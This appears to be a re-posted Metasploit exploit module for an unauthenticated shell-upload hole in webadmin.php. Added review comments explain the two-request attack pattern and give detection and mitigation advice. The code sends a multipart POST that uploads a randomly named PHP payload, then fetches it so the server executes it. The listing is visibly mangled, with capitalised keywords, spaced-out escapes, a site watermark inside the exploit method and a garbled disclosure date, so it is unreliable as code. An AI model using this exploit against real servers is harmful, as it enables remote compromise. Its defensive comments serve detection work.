Title: webadmin <= Shell Upload Vulnerability (MSF)
Author: Caddy-Dz www.2cto.com
Reference: http://wacker-welt.de/webadmin/webadmin.php.gz
Require 'msf/core'
# Metasploit module record for an arbitrary file upload in webadmin.php.
#
# NOTE(review): this listing was mangled by the hosting page (capitalised
# keywords, spaces inserted into constants and string escapes, and a
# "Www.2cto.com" site watermark injected into the exploit method), so it does
# not parse as Ruby. It is documented here as a record of the request pattern.
#
# What the visible code establishes:
#   * The target is a PHP application ('Platform' / 'Arch' are PHP) and the
#     module does not claim a privileged context ('Privileged' => false).
#   * The upload request carries only Content-type and Content-length
#     headers, with no cookie or credential. That suggests the upload handler
#     is reachable without authentication; confirm against the deployed script.
#
# Detection: in web-server logs, look for a multipart/form-data POST to
# webadmin.php containing a part whose filename ends in .php (declared as
# application/x-httpd-php), followed shortly by a GET for a newly created
# .php file with an 8-character random alphanumeric name.
#
# Mitigation: remove webadmin.php from internet-facing hosts or put it behind
# authentication and network restrictions, and configure the web server so
# that files in writable or upload directories are never executed as PHP.
Class Metasploit3 <Msf: Exploit: Remote
Rank = GreatRanking
Include Msf: Exploit: Remote: Tcp
Include Msf: Exploit: Remote: HttpClient
# Registers the module metadata and one string option, the path to webadmin
# (default "/").
# NOTE(review): the disclosure date string below is garbled; presumably
# September 13, 2011. Confirm against the original advisory.
Def initialize (info = {})
Super (update_info (info,
'Name' => 'webadmin <= Shell Upload Vulnerability ',
'Description' => % q {
This module exploits an arbitrary shell upload vulnerability in
The webadmin. php
},
'Author' => ['caddy-dz'],
'License '=> MSF_LICENSE,
'References '=> ["http://wacker-welt.de/webadmin/webadmin.php.gz"],
'Privileged' => false,
'Payload' =>
{
'Disablenops' => true,
},
'Platform' => 'php ',
'Arch '=> ARCH_PHP,
'Targets' => [['automatically ', {}],
'Defaulttarget' => 0,
'Disclosuredate' => 'sept 13,201 1'
))
Register_options ([
OptString. new ('uri ', [true, "Path to webadmin", "/"]),
], Self. class)
End
# Two-request sequence, which is the pattern defenders should look for:
#   1. A multipart/form-data POST to webadmin.php with a single form field
#      named Filedata, a random 8-character filename ending in .php, and the
#      payload as the part body (timeout argument 25).
#   2. If any response came back, the text before the first "_" in the
#      response body is taken as the stored file's path and requested with a
#      GET (timeout argument 0.01), so that the server executes it.
# The multipart boundary is a random 6-character alphanumeric string, so it
# is not a stable signature; the .php filename inside the part is.
Def exploit
Boundary = rand_text_alphanumeric (6)
Fn = rand_text_alphanumeric (8)
Data = "-- # {boundary} \ r \ nContent-Disposition: form-data; name = \" Filedata \";"
Data <"filename = \" # {fn}. php \ "\ r \ nContent-Type: application/x-httpd-php \ r \ n"
Data <payload. encoded
Data <"\ r \ n -- # {boundary }--"
Res = send_request_raw ({
'Url' => datastore ['url'] + "/webadmin. php ",
'Method' => 'post ',
'Data' => data,
'Headers' =>
{
'Content-type' => 'multipart/form-data; boundary = '+ boundary,
'Content-length' => data. Length,
}
}, 25)
# Any response at all is treated as a successful upload; the status code and
# body content are not checked before the follow-up GET.
If (res)
Www.2cto.com print_status ("Successfully uploaded shell .")
Shell_path = res. body. split ("_") [0]
Print_status ("Trying to access shell at # {shell_path }...")
Res = send_request_raw ({
'Url' => datastore ['url'] + shell_path,
'Method' => 'get ',
}, 0.01)
Else
Print_error ("Error uploading shell ")
End
Handler
End
End